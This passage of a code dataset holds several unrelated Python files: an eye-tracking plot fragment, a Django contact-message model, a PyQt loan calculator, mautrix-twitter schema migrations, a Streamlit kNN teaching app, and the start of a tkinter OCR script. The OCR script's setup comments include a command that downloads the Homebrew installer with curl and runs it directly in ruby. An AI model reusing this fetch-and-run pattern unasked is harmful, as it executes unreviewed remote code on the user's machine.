outputGROUP.AOI1propLook = (outputGROUP.AOI_One_ms/outputGROUP.TrialDuration_ms)\n        outputGROUP.AOI2propLook = (outputGROUP.AOI_Two_ms/outputGROUP.TrialDuration_ms)\n        ax = outputGROUP.AOI1propLook.plot(color='r', figsize=(30, 10), legend = True, label = 'AOI One')\n        outputGROUP.AOI2propLook.plot(color='b', legend = True, label = 'AOI Two')\n        tick_spacing = 5\n        ax.set_xlabel('Trial', fontsize = 20)\n        ax.set_ylabel('Proportion of looking to AOI', fontsize = 20)\n        ax.xaxis.set_major_locator(ticker.MultipleLocator(tick_spacing))\n        ax.tick_params(labelsize=20)\n\n\n# In[ ]:\n\n#ImportGazeFile()  # notebook cell stub: pass a gaze export file path to run\n\n","repo_name":"antovich/UC-Davis","sub_path":"Python/PyTracking Project/PyTrackingFunctions.py","file_name":"PyTrackingFunctions.py","file_ext":"py","file_size_in_byte":5610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"29553312726","text":"from django.db import models\nimport uuid\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom api.helpers.mail import send_mail\nfrom django.template.loader import render_to_string\n\nclass Message(models.Model):\n    name = models.CharField(max_length=150, blank=False)\n    email = models.EmailField(blank=False)\n    message = models.TextField(blank=False)\n    created = models.DateTimeField(auto_now_add=True)\n\n    \n@receiver(post_save, sender=Message)\ndef send_notification(sender, instance, created, **kwargs):\n    if created:\n        context = {\n            'message': instance,\n        }\n\n        html_content = render_to_string(\n            'api/contact_message_notification.html', context\n        )\n\n        send_mail(\n            to_emails=\"me@andrewtolochka.com\",\n            subject=f'New contact message from {instance.name}',\n            html_content=html_content\n        )\n","repo_name":"socialize-berlin/backend","sub_path":"api/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
{"seq_id":"10302838733","text":"####################################\r\n# 贷款利率计算 练习\r\n# 作者 最爱点灯的星星\r\n# Ver1.0\r\n# 目前没有加入异常处理,只能实现等额本息\r\n######################################\r\n\r\nimport sys\r\nfrom PyQt5 import QtCore, QtGui, uic, QtWidgets\r\n\r\nuiFile = \"loan.ui\"\r\nUi_MyMainWindow, QtBaseClass = uic.loadUiType(uiFile)\r\n\r\n\r\nclass MyApp(QtWidgets.QMainWindow, Ui_MyMainWindow):\r\n    def __init__(self):\r\n        QtWidgets.QMainWindow.__init__(self)\r\n        Ui_MyMainWindow.__init__(self)\r\n        self.setupUi(self)\r\n        self.butt_calc.clicked.connect(self.loan_Compute)\r\n\r\n    def loan_Compute(self):\r\n        self.outlist.clear()\r\n\r\n        loan_Num = int(self.loannum.text()) #借款总金额\r\n        Annual_interest_rate = (self.rate.value())/100 #年化利率 不用输%号\r\n        stage = self.period.value() #借款期数 (按月为单位!)\r\n\r\n        for ii in range(1,stage + 1):\r\n            if(ii == 1):\r\n                monthly_all = loan_Num * (Annual_interest_rate / 12) * pow((1 + (Annual_interest_rate / 12)), stage) / (\r\n                    pow((1 + (Annual_interest_rate / 12)), stage) - 1)  # 月均还款(本金+利息)\r\n                repay_rate_all = stage * loan_Num * (Annual_interest_rate / 12) * pow((1 + (Annual_interest_rate / 12)),\r\n                    stage) / (pow((1 + (Annual_interest_rate / 12)), stage) - 1) - loan_Num  # 还款利息总和\r\n                repay_rate_1 = loan_Num * (Annual_interest_rate / 12)  # 还款利息\r\n                surplus_rate = repay_rate_all - repay_rate_1  # 剩余利息\r\n                surplus_loan_num = loan_Num - (monthly_all - repay_rate_1)  # 剩余本金\r\n                outstr = \"1: 利息 %.3f 本金 %.3f 还款总额(本金+利息) %.3f \" % ( repay_rate_1, monthly_all - repay_rate_1, monthly_all)\r\n            else:\r\n                repay_rate_n_1 = (loan_Num * 
(Annual_interest_rate/12) - monthly_all)*pow((1 + (Annual_interest_rate/12)),(ii - 1)) + monthly_all\r\n surplus_loan_num = monthly_all - repay_rate_n_1\r\n outstr = \"{} : 利息 {} 本金 {} 还款总额(本金+利息){}\".format(ii, repay_rate_n_1, surplus_loan_num, monthly_all)\r\n\r\n self.outlist.addItem(outstr)\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n Main_window = MyApp()\r\n Main_window.show()\r\n sys.exit(app.exec_())","repo_name":"InOrderToGo/pythonlearn","sub_path":"loan.py","file_name":"loan.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"31956138998","text":"from asyncpg import Connection\n\nfrom mautrix.util.async_db import UpgradeTable\n\nupgrade_table = UpgradeTable()\n\n\n@upgrade_table.register(description=\"Initial revision\")\nasync def upgrade_v1(conn: Connection) -> None:\n await conn.execute(\"CREATE TYPE twitter_conv_type AS ENUM ('ONE_TO_ONE', 'GROUP_DM')\")\n await conn.execute(\n \"\"\"CREATE TABLE portal (\n twid VARCHAR(255),\n receiver BIGINT,\n conv_type twitter_conv_type NOT NULL,\n other_user BIGINT,\n mxid VARCHAR(255),\n name VARCHAR(255),\n encrypted BOOLEAN NOT NULL DEFAULT false,\n\n PRIMARY KEY (twid, receiver)\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE \"user\" (\n mxid VARCHAR(255) PRIMARY KEY,\n twid BIGINT,\n auth_token VARCHAR(255),\n csrf_token VARCHAR(255),\n poll_cursor VARCHAR(255),\n notice_room VARCHAR(255)\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE puppet (\n twid BIGINT PRIMARY KEY,\n name VARCHAR(255),\n photo_url VARCHAR(255),\n photo_mxc VARCHAR(255),\n\n is_registered BOOLEAN NOT NULL DEFAULT false,\n\n custom_mxid VARCHAR(255),\n access_token TEXT,\n next_batch VARCHAR(255)\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE user_portal (\n \"user\" BIGINT,\n portal VARCHAR(255),\n portal_receiver BIGINT,\n in_community BOOLEAN NOT NULL DEFAULT false,\n\n FOREIGN KEY (portal, portal_receiver) REFERENCES portal(twid, receiver)\n ON UPDATE CASCADE ON DELETE CASCADE\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE message (\n mxid VARCHAR(255) NOT NULL,\n mx_room VARCHAR(255) NOT NULL,\n twid BIGINT,\n receiver BIGINT,\n\n PRIMARY KEY (twid, receiver),\n UNIQUE (mxid, mx_room)\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TYPE twitter_reaction_key AS ENUM (\n 'funny', 'surprised', 'sad', 'like', 'excited', 'agree', 'disagree'\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE reaction (\n mxid VARCHAR(255) NOT NULL,\n mx_room VARCHAR(255) NOT NULL,\n tw_msgid BIGINT,\n tw_receiver BIGINT,\n tw_sender BIGINT,\n reaction twitter_reaction_key NOT NULL,\n\n PRIMARY KEY (tw_msgid, tw_receiver, tw_sender),\n FOREIGN KEY (tw_msgid, tw_receiver) REFERENCES message(twid, receiver)\n ON DELETE CASCADE ON UPDATE CASCADE,\n UNIQUE (mxid, mx_room)\n )\"\"\"\n )\n\n\n@upgrade_table.register(description=\"Add double-puppeting base_url to puppet table\")\nasync def upgrade_v2(conn: Connection) -> None:\n await conn.execute(\"ALTER TABLE puppet ADD COLUMN base_url TEXT\")\n\n\n@upgrade_table.register(description=\"Store Twitter reaction IDs for marking things read\")\nasync def upgrade_v3(conn: Connection) -> None:\n await conn.execute(\"ALTER TABLE reaction ADD COLUMN tw_reaction_id 
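# --- illustrative sketch, not part of the original dataset record ---
# New schema revisions in this module all follow the same pattern as
# upgrade_v1..v3: register a coroutine on the UpgradeTable and run DDL
# through the asyncpg connection. A hypothetical next revision (v4 and
# the index name are assumptions, not part of the project) would look
# like:
@upgrade_table.register(description="Example: index messages by room")
async def upgrade_v4(conn: Connection) -> None:
    await conn.execute("CREATE INDEX message_mx_room_idx ON message (mx_room)")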
BIGINT\")\n","repo_name":"roghumi/matrix-twitter","sub_path":"mautrix_twitter/db/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"35265000399","text":"# https://github.com/sudhir-voleti/MLBM/blob/master/Lec2a%20KNNs_for_Classif_%26_Regn.ipynb\r\n\r\n#importing libraries\r\nimport streamlit as st\r\nimport mglearn\r\nimport graphviz\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport numpy as np\r\nimport time\r\nimport pandas as pd\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.datasets import load_breast_cancer\r\n\r\nfrom sklearn.metrics import mean_squared_error \r\nimport math\r\n\r\nst.set_option('deprecation.showfileUploaderEncoding', False)\r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n\r\n@st.cache(persist=True) # It will help in storing dataset and do not read again when any change is done on UI\r\ndef load_data(file):\r\n data = pd.read_csv(file)\r\n return data\r\n \r\n@st.cache(persist=True) \r\ndef preprocess_data(data):\r\n #Missing Value imputation and encoding categorical columns\r\n for col in data.columns:\r\n if data[col].dtypes=='object':\r\n data[col]=data[col].fillna(data[col].mode()[0])\r\n label = LabelEncoder()\r\n data[col] = label.fit_transform(data[col])\r\n else:\r\n data[col]=data[col].fillna(data[col].median())\r\n return data\r\n\r\n@st.cache(persist=True)\r\ndef split(df,test_size,target,predictors):\r\n y = df[target]\r\n x = df[predictors]\r\n x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=test_size,random_state=0)\r\n return x_train, x_test, y_train, y_test\r\n\r\n\r\n#Function to simulate dummy dataset for classification problem\r\n\r\ndef simulate_data_classification():\r\n # simulate a dummy dataset \r\n X, y = mglearn.datasets.make_forge()\r\n print(\"X.shape:\", X.shape)\r\n\r\n # see data pattern\r\n mglearn.discrete_scatter(X[:, 0], X[:, 1], y)\r\n\r\n # plot parms\r\n plt.legend([\"Class 0\", \"Class 1\"], loc=4)\r\n plt.xlabel(\"First feature\")\r\n plt.ylabel(\"Second feature\")\r\n plt.show()\r\n \r\n#Function to simulate dummy dataset for regression problem\r\n\r\ndef simulate_data_regression():\r\n X, y = mglearn.datasets.make_wave(n_samples=40)\r\n test_data = [-1.5, 0.9, 1.5]\r\n\r\n # view data scatterplot pattern\r\n plt.plot(X, y, 'bo', label=\"data\")\r\n plt.plot(test_data, [-2.7, -2.7, -2.7], 'g*', label=\"test points\")\r\n plt.xlabel(\"Feature\")\r\n plt.ylabel(\"Target\")\r\n plt.legend()\r\n\r\n\r\n#function to build kNN using mglearn inbuilt figures.\r\n\r\ndef kNN_mglearn_classification(n_neighbors):\r\n return mglearn.plots.plot_knn_classification(n_neighbors=n_neighbors)\r\n \r\n \r\ndef kNN_mglearn_regression(n_neighbors):\r\n return mglearn.plots.plot_knn_regression(n_neighbors=n_neighbors)\r\n \r\n \r\n\r\n#Function to split the data and to fit the model\r\n\r\ndef data_split_classification(test_size,n):\r\n X, y = mglearn.datasets.make_forge()\r\n #stratified train-test split with random seed\r\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=test_size,random_state=0)\r\n \r\n ## instantiate model and training model on train data\r\n \r\n clf = KNeighborsClassifier(n_neighbors=n).fit(X_train, 
y_train) \r\n return X_train,X_test,y_train,y_test,clf\r\n \r\n \r\ndef data_split_regression(test_size):\r\n X, y = mglearn.datasets.make_wave(n_samples=40)\r\n\r\n # split the wave dataset into a training and a test set\r\n X_train, X_test, y_train, y_test = train_test_split(X, y,test_size=test_size,random_state=0)\r\n return X_train,X_test,y_train,y_test\r\n \r\n#Function to check accuracy and plot for the kNN classification model\r\n\r\ndef kNN_classification_pred_plot(test_size,n):\r\n X_train,X_test,y_train,y_test,clf=data_split_classification(test_size,n)\r\n predictions=clf.predict(X_test)\r\n \r\n # plotting train & test pts separately\r\n y_train_0 = (y_train == 0) # make indices\r\n y_train_1 = (y_train == 1)\r\n\r\n y_test_0 = (predictions == 0)\r\n y_test_1 = (predictions == 1)\r\n\r\n plt.plot(X_train[y_train_0, 0], X_train[y_train_0, 1], 'bo', label=\"Train 0\")\r\n plt.plot(X_train[y_train_1, 0], X_train[y_train_1, 1], 'g^', label=\"Train 1\")\r\n\r\n plt.plot(X_test[y_test_0, 0], X_test[y_test_0, 1], 'ro', label=\"Test 0\")\r\n plt.plot(X_test[y_test_1, 0], X_test[y_test_1, 1], 'r^', label=\"Test 1\")\r\n\r\n plt.legend()\r\n \r\n \r\ndef plot_regression(test_size,n):\r\n # setting stage to show 3 (sub)plots side-by-side\r\n X_train, X_test, y_train, y_test = data_split_regression(test_size)\r\n fig, axes = plt.subplots(1, 3, figsize=(15, 4))\r\n\r\n # create 1,000 data points, evenly spaced between -3 and 3\r\n import numpy as np\r\n line = np.linspace(-3, 3, 1000).reshape(-1, 1)\r\n\r\n\r\n # loop over k=1,3,9 and over axes\r\n for n_neighbors, ax in zip([n, n+2, n+8], axes):\r\n\r\n # make predictions using 1, 3, or 9 neighbors\r\n reg = KNeighborsRegressor(n_neighbors=n_neighbors)\r\n reg.fit(X_train, y_train)\r\n\r\n # plot and show\t\r\n ax.plot(line, reg.predict(line))\r\n ax.plot(X_train, y_train, '^', c=mglearn.cm2(0), markersize=8)\r\n ax.plot(X_test, y_test, 'v', c=mglearn.cm2(1), markersize=8)\r\n\r\n ax.set_title(\r\n \"{} neighbor(s)\\n train score: {:.2f} test score: {:.2f}\".format(\r\n n_neighbors, reg.score(X_train, y_train),\r\n reg.score(X_test, y_test)))\r\n\r\n ax.set_xlabel(\"Feature\")\r\n ax.set_ylabel(\"Target\")\r\n\r\n\r\n axes[0].legend([\"Model predictions\", \"Training data/target\",\r\n \"Test data/target\"], loc=\"best\")\r\n \r\n\r\ndef main():\r\n \r\n st.set_option('deprecation.showPyplotGlobalUse',False)\r\n st.title('Streamlit kNN app for classification and Regression')\r\n st.write('Aim is to demo basic concepts.Select the option given on the left to proceed:')\r\n st.sidebar.header('User Inputs')\r\n problem_type=st.sidebar.radio('Problem Type',(\"Classification\",\"Regression\"),key = 'problem_type')\r\n \r\n if problem_type=='Classification':\r\n menu=[\"Dummy Data Plot\",\"Different n plot with Dummy Data\",\"kNN Classification with Dummy Data\",\"kNN on Real dataset\"]\r\n choice=st.sidebar.selectbox(\"Menu\",menu)\r\n \r\n if choice==\"Dummy Data Plot\":\r\n st.markdown(\"### Simulated dataset plot\")\r\n #st.write('How many data points to simulate in 2D')\r\n st.pyplot(simulate_data_classification())\r\n \r\n if choice==\"Different n plot with Dummy Data\":\r\n st.markdown(\"### Plot with different neighbors\")\r\n st.write('How many neighbors you want to consider')\r\n n=st.sidebar.slider(\"Select the number of neighbors\",1,5)\r\n st.text('Selected: {}'.format(n))\r\n st.pyplot(kNN_mglearn_classification(n))\r\n st.write('The stars in the graph above are the unlabeled units for which we have to predict the class.')\r\n \r\n 
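# --- illustrative sketch, not part of the original dataset record ---
# What KNeighborsClassifier does under the hood, in plain numpy: label a
# query point by majority vote among the k training points closest in
# Euclidean distance.
import numpy as np

def knn_predict(X_train, y_train, x_query, k=3):
    dists = np.linalg.norm(X_train - x_query, axis=1)  # distance to each train point
    nearest = np.argsort(dists)[:k]                    # indices of the k closest
    votes = y_train[nearest]
    return np.bincount(votes).argmax()                 # majority class

X = np.array([[0.0, 0.0], [0.1, 0.2], [1.0, 1.0], [0.9, 1.1]])
y = np.array([0, 0, 1, 1])
print(knn_predict(X, y, np.array([0.8, 0.9]), k=3))  # -> 1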
if choice==\"kNN Classification with Dummy Data\":\r\n st.markdown(\" ## Accuracy and plot for kNN classification\")\r\n #st.sidebar.subheader(\"Data Partition\")\r\n st.sidebar.subheader(\"Data Partition\")\r\n tt_split = st.sidebar.expander(\"Train/Test Split\")\r\n test_size = tt_split.number_input(\"Enter Test size (proportion)\",0.10,0.99,step=0.1,key=\"test_size\",value=0.30)\r\n n=st.sidebar.slider(\"Select the number of neighbors\",1,5)\r\n \r\n X_train,X_test,y_train,y_test,clf=data_split_classification(test_size,n)\r\n \r\n predictions=clf.predict(X_test)\r\n #st.write(\"Specs of the kNN: \", clf, \"\\n\")\r\n \r\n # apply trained model on test\r\n st.markdown(\" ## Evaluating kNN Performance\")\r\n st.write(\"kNN training set score:\",round(clf.score(X_train,y_train),2),\"\\n\")\r\n #st.write(\"kNN test set prediction:\",predictions)\r\n st.write(\"kNN test set score:\",round(clf.score(X_test,y_test),2),\"\\n\")\r\n st.pyplot(kNN_classification_pred_plot(test_size,n))\r\n st.write('The red points are test data. Their shape (triangle vs circle) tells us of the class they were assigned to.')\r\n \r\n if choice==\"kNN on Real dataset\":\r\n uploaded_file = st.sidebar.file_uploader(\"Choose a CSV file\", accept_multiple_files=False,type=['csv'],key='uploaded_file')\r\n if uploaded_file is not None:\r\n data = load_data(uploaded_file)\r\n data_1=data.copy()\r\n \r\n data_1=preprocess_data(data_1)\r\n if st.sidebar.checkbox(\"Show raw data\",False):\r\n st.write(data)\r\n st.write('Above is raw data')\r\n \r\n if st.sidebar.checkbox(\"Show Preproces data\",False):\r\n st.write(data_1)\r\n st.write('Above is Data After Preprocessing')\r\n \r\n \r\n st.sidebar.subheader(\"Features Selection & Data Partition\")\r\n #if st.sidebar.checkbox(\"Train/Test Split (default 70:30)\",False,key='t_t_split') :\r\n tt_split = st.sidebar.beta_expander(\"Train/Test Split\")\r\n target = tt_split.selectbox(\"Select Target Variable\",data_1.columns,key=\"target\")\r\n predictors = [v for v in data_1.columns if v!=target]\r\n new_predictors = tt_split.multiselect(\"Select Predictors\",options=predictors,default=predictors)\r\n test_size = tt_split.number_input(\"Enter Test size (proportion)\",0.10,0.99,step=0.1,key=\"test_size\",value=0.30)\r\n class_names = data_1[target].unique()\r\n \r\n if tt_split.checkbox(\"Dataset with selected features\",False):\r\n st.write(data_1[new_predictors])\r\n st.write(\"Above is the dataset with selected features\")\r\n \r\n if tt_split.checkbox(\"Split the dataset\",False):\r\n X_train, X_test, y_train, y_test = split(data_1,test_size,target,new_predictors)\r\n st.write('X Train Data shape after splitting',X_train.shape)\r\n st.write('X Test Data shape after splitting',X_test.shape)\r\n \r\n st.sidebar.subheader(\"Model Development\")\r\n n=st.sidebar.slider(\"Select the number of neighbors for kNN\",1,10)\r\n st.sidebar.subheader('Click the below button after selecting a particular n value')\r\n \r\n if st.sidebar.button(\"Accuracy Vs neighbours Plot\"):\r\n # deine empty lists to capture output\r\n training_accuracy = []\r\n test_accuracy = []\r\n \r\n # try n_neighbors from 1 to 10\r\n neighbors_settings = range(1, n+1)\r\n \r\n # use a for loop over k=1 to 10\r\n for n_neighbors in neighbors_settings:\r\n\r\n # build the model\r\n clf = KNeighborsClassifier(n_neighbors=n_neighbors)\r\n clf.fit(X_train, y_train)\r\n\r\n # record training set accuracy\r\n training_accuracy.append(clf.score(X_train, y_train))\r\n \r\n # record generalization accuracy\r\n 
test_accuracy.append(clf.score(X_test, y_test))\r\n \r\n # now plot the results and see \r\n plt.plot(neighbors_settings, training_accuracy, label=\"training accuracy\")\r\n plt.plot(neighbors_settings, test_accuracy, label=\"test accuracy\")\r\n plt.ylabel(\"Accuracy\")\r\n plt.xlabel(\"n_neighbors\")\r\n plt.legend()\r\n st.pyplot()\r\n \r\n \r\n if problem_type=='Regression':\r\n \r\n menu=[\"Dummy data plot\",\"kNN on Dummy Set with different n\",\"kNN on Dummy Set\",\"kNN Regression on Real Dataset\"]\r\n choice=st.sidebar.selectbox(\"Menu\",menu)\r\n \r\n if choice==\"Dummy data plot\":\r\n st.markdown(\"### Simulated Dataset Plot\")\r\n #st.write('How many data points to simulate in 2D')\r\n st.pyplot(simulate_data_regression())\r\n st.write('In the above figure Vertical axis is target or Y variable. Horiz axis is a feature or a (say) 1-D projection of feature set.Given locations of new data (green stars) on the X-axis, what is their predicted Y value')\r\n \r\n if choice==\"kNN on Dummy Set with different n\":\r\n st.markdown(\"### Plot with different neighbors\")\r\n st.write('How many neighbors you want to consider')\r\n n=st.sidebar.slider(\"Select the number of neighbors\",1,5,value=1)\r\n st.text('Selected: {}'.format(n))\r\n st.pyplot(kNN_mglearn_regression(n))\r\n st.write('From the above figure Under kNN(k=1), the predicted Y is merely the same Y as that of the nearest neighbor on the x-axis to the new data point.Same carries over as weighted mean Y of k nearest neighbors when analyzed with kNN(k=k).')\r\n \r\n if choice==\"kNN on Dummy Set\":\r\n \r\n st.markdown(\" ## Accuracy and plot for kNN regression\")\r\n st.sidebar.subheader(\"Data Partition\")\r\n tt_split = st.sidebar.beta_expander(\"Train/Test Split\")\r\n test_size = tt_split.number_input(\"Enter Test size (proportion)\",0.10,0.99,step=0.1,key=\"test_size\",value=0.30)\r\n n=st.sidebar.slider(\"Select the number of neighbors\",1,5)\r\n X_train, X_test, y_train, y_test = data_split_regression(test_size)\r\n\r\n # instantiate the model and set the number of neighbors to consider to 3\r\n reg = KNeighborsRegressor(n_neighbors=n).fit(X_train, y_train)\r\n\r\n st.write(\"kNN test set predictions:\\n\",reg.predict(X_test),\"\\n\")\r\n st.write(\"Test set R^2: \",round(reg.score(X_test,y_test),2),\"\\n\")\r\n \r\n st.pyplot(plot_regression(test_size,n))\r\n st.write(\"Note how the regression line (blue line connecting the blue triangle data) smoothens out and flattens out as k rises\")\r\n\r\n st.write(\"Note also how the training and test score (akin to R^2) changes with k\")\r\n\r\n st.write(\"At k=1 overfits the data (hence training RMSE=0 & score=1) but generalizes very poorly to unseen test data (score is merely 0.35)\")\r\n\r\n st.write(\"Seems, k=3 is ideal with test score actually beating even training score\")\r\n \r\n \r\n if choice==\"kNN Regression on Real Dataset\":\r\n uploaded_file = st.sidebar.file_uploader(\"Choose a CSV file\", accept_multiple_files=False,type=['csv'],key='uploaded_file')\r\n if uploaded_file is not None:\r\n data = load_data(uploaded_file)\r\n \r\n data_2=data.copy()\r\n \r\n data_2=preprocess_data(data_2)\r\n if st.sidebar.checkbox(\"Show raw data\",False):\r\n st.write(data)\r\n st.write('Above is raw data')\r\n \r\n if st.sidebar.checkbox(\"Show Preproces data\",False):\r\n st.write(data_2)\r\n st.write('Above is Data After Preprocessing')\r\n \r\n st.sidebar.subheader(\"Features Selection & Data Partition\")\r\n \r\n #if st.sidebar.checkbox(\"Train/Test Split (default 
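# --- illustrative sketch, not part of the original dataset record ---
# Once the train/test curves from the loop above are collected, a simple
# selection rule is to keep the k with the highest held-out score; max()
# returns the first maximum, i.e. the smallest such k. The scores below
# are made up for illustration:
neighbors_settings = range(1, 11)
test_accuracy = [0.70, 0.78, 0.81, 0.80, 0.79, 0.79, 0.78, 0.77, 0.77, 0.76]
best_k = max(neighbors_settings, key=lambda k: test_accuracy[k - 1])
print(best_k)  # 3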
70:30)\",False,key='t_t_split') :\r\n tt_split = st.sidebar.beta_expander(\"Train/Test Split\")\r\n target = tt_split.selectbox(\"Select Target Variable\",data_2.columns,key=\"target\")\r\n predictors = [v for v in data_2.columns if v!=target]\r\n new_predictors = tt_split.multiselect(\"Select Predictors\",options=predictors,default=predictors)\r\n test_size = tt_split.number_input(\"Enter Test size (proportion)\",0.10,0.99,step=0.1,key=\"test_size\",value=0.30)\r\n class_names = data_2[target].unique()\r\n \r\n if tt_split.checkbox(\"Dataset with selected features\",False):\r\n st.write(data_2[new_predictors])\r\n st.write('Above is the dataset with selected features')\r\n \r\n if tt_split.checkbox(\"Split the dataset\",False):\r\n X_train, X_test, y_train, y_test = split(data_2,test_size,target,new_predictors)\r\n st.write('X Train Data shape after splitting',X_train.shape)\r\n st.write('X Test Data shape after splitting',X_test.shape)\r\n \r\n st.sidebar.subheader(\"Model Development\")\r\n \r\n n=st.sidebar.slider(\"Select the number of neighbors for kNN\",1,10)\r\n \r\n st.sidebar.subheader('Click the below button after selecting a particular n value')\r\n if st.sidebar.button(\"Plot\"):\r\n # deine empty lists to capture output\r\n \r\n rmse_values=[]\r\n training_accuracy = []\r\n test_accuracy = []\r\n \r\n # try n_neighbors from 1 to 10\r\n neighbors_settings = range(1, n+1)\r\n \r\n # use a for loop over k=1 to 10\r\n for n_neighbors in neighbors_settings:\r\n\r\n # build the model\r\n reg = KNeighborsRegressor(n_neighbors=n_neighbors)\r\n reg.fit(X_train, y_train)\r\n \r\n y_pred=reg.predict(X_test)\r\n \r\n err=math.sqrt(mean_squared_error(y_test,y_pred))\r\n \r\n rmse_values.append(err)\r\n # record training set accuracy\r\n training_accuracy.append(reg.score(X_train, y_train))\r\n \r\n # record generalization accuracy\r\n test_accuracy.append(reg.score(X_test, y_test))\r\n \r\n # now plot the results and see \r\n plt.subplot(2, 1, 1)\r\n plt.plot(neighbors_settings, rmse_values, label=\"RMSE\")\r\n plt.ylabel(\"RMSE\")\r\n plt.xlabel(\"n_neighbors\")\r\n \r\n plt.subplot(2, 1, 2)\r\n # now plot the results and see \r\n plt.plot(neighbors_settings, training_accuracy, label=\"training accuracy\")\r\n plt.plot(neighbors_settings, test_accuracy, label=\"test accuracy\")\r\n plt.ylabel(\"Accuracy\")\r\n plt.xlabel(\"n_neighbors\")\r\n plt.legend()\r\n st.pyplot()\r\n \r\n \r\n \r\nif __name__=='__main__':\r\n main()\r\n","repo_name":"ManishKumar-4/Streamlit-Apps","sub_path":"kNN/lec2a_knn_streamlit.py","file_name":"lec2a_knn_streamlit.py","file_ext":"py","file_size_in_byte":19173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34114985045","text":"# 1, Download visual studio code at https://code.visualstudio.com/ and then insall\n# 2, Install extension python whose authon is microsoft\n# 3, Download python at https://www.python.org/downloads/ Python 3.8.1 and then install\n# 4, test if python is install sucessfully by typing python3 -m tkinter, you will see a small windows if installed sucessfully\n# 5, install pillow by typing pip3 install pillow\n# 6, install pytesseract by typing pip3 install pytesseract \n# 7, install tesseract by typing brew install tesseract\n# 8, if has not install brew, install it by typing \n#/usr/bin/ruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\"\n\n# image to string \nimport pytesseract\n\n# Tkinter is Python's de-facto standard GUI (Graphical 
User Interface) Package\n# It is a thin object-oriented layer on top of Tcl/Tk. \nimport tkinter as tk\nimport os\n\n# Regular expression \nimport re\nfrom tkinter import messagebox\n#PIL Python image libarary \nfrom PIL import ImageTk, ImageGrab, Image\n\ndirDict = {'left': 'L', 'right': 'R','north': 'N', 'south': 'S', 'west': 'W', 'east': 'E'}\nmainWindow = tk.Tk()\n# mainWindow.geometry('500x500')\n\nimageLabel = tk.Label(mainWindow, width = 50, height = 50) # , width=82\nimageLabel.grid(row=0, column=0, sticky='nsew')\n\ntextOcr = tk.Text(mainWindow)\ntextOcr.grid(row=0, column=1, sticky=\"nsew\")\n\ntextResult = tk.Text(mainWindow)\ntextResult.grid(row=0, column=2, sticky=\"nsew\")\n\n\n# searchcurve function is for curve \n\ndef searchcurve(text, regex, description, resultdict):\n # declared a variable, store the result later\n result = \"\"\n \n for matches in re.finditer(regex, text, re.IGNORECASE):\n \n # convert current match to dictionary \n gd = matches.groupdict() \n \n #messagebox.showinfo(message = str(gd))\n\n if matches.group('radius') is None :\n messagebox.showinfo(message = 'radius is none')\n\n radiusfeet = ''\n if matches.group('radiusfeet') is None :\n messagebox.showinfo(message = 'radiusfeet is none')\n else:\n radiusfeet = matches.group('radiusfeet')\n\n curvedir = ''\n if matches.group(\"curvedir\") is None:\n messagebox.showinfo(message = 'curvedir')\n else: \n curvedir = dirDict[matches.group('curvedir').lower()]\n\n dir1 = ''\n # it will show a messagebox from tkinter \n if matches.group('dir1') is None :\n messagebox.showinfo(message='dir1 is none')\n else:\n #messagebox.showinfo(message =matches.group(\"dir1\"))\n dir1 = dirDict[matches.group('dir1').lower()]\n \n degrees = ''\n if matches.group('degrees') is None :\n messagebox.showinfo(message='degrees is none')\n else:\n #messagebox.showinfo(message =matches.group(\"degrees\"))\n degrees = matches.group('degrees')\n \n minutes = ''\n if \"minutes\" in gd:\n #messagebox.showinfo(message= matches.group(\"minutes\"))\n minutes = matches.group('minutes')\n if minutes is None:\n minutes = \"00\"\n else:\n #messagebox.showinfo(message =\"doesn't have minutes\")\n minutes = \"00\"\n\n seconds = ''\n if \"seconds\" in gd:\n #messagebox.showinfo(message= matches.group(\"seconds\"))\n seconds = matches.group('seconds')\n if seconds is None:\n seconds = \"00\"\n else:\n messagebox.showinfo(message =\"doesn't have seconds\")\n seconds = \"00\"\n \n dir2 = ''\n if matches.group('dir2') is None :\n messagebox.showinfo(message='dir2 is none')\n else:\n dir2 = dirDict[matches.group('dir2').lower()]\n #messagebox.showinfo(message = dir2)\n \n\n feet = ''\n if matches.group('feet') is None :\n messagebox.showinfo(message='feet is none')\n else:\n feet = matches.group('feet')\n #messagebox.showinfo(message = \"feet is: \" + feet)\n\n\n\n resultdict[matches.start()] = \"NC \" + \"R \" + radiusfeet + \" C \" + feet + \" C \" + dir1 + degrees + \"-\" + minutes + \"-\" + seconds + dir2 + \" \" + curvedir + '\\n'\n resultdict[-matches.start()] = matches.end()-matches.start()\n #result = result + \"NC \" + \"R \" + radiusfeet + \" C \" + feet + \" C \" + dir1 + degrees + \"-\" + minutes + \"-\" + seconds + dir2 + \" \" + curvedir + '\\n'\n #messagebox.showinfo(message= \"result is: \" + result)\n\n # delete to avoid duplication prints \n \n # insert the result to the text box\n # result = description + '\\n' + \"*******\"+ \"\\n\"+ result+\"\\n\"\n # textResult.insert(tk.END, result)\n\n\n# search 1 function is for DD \ndef 
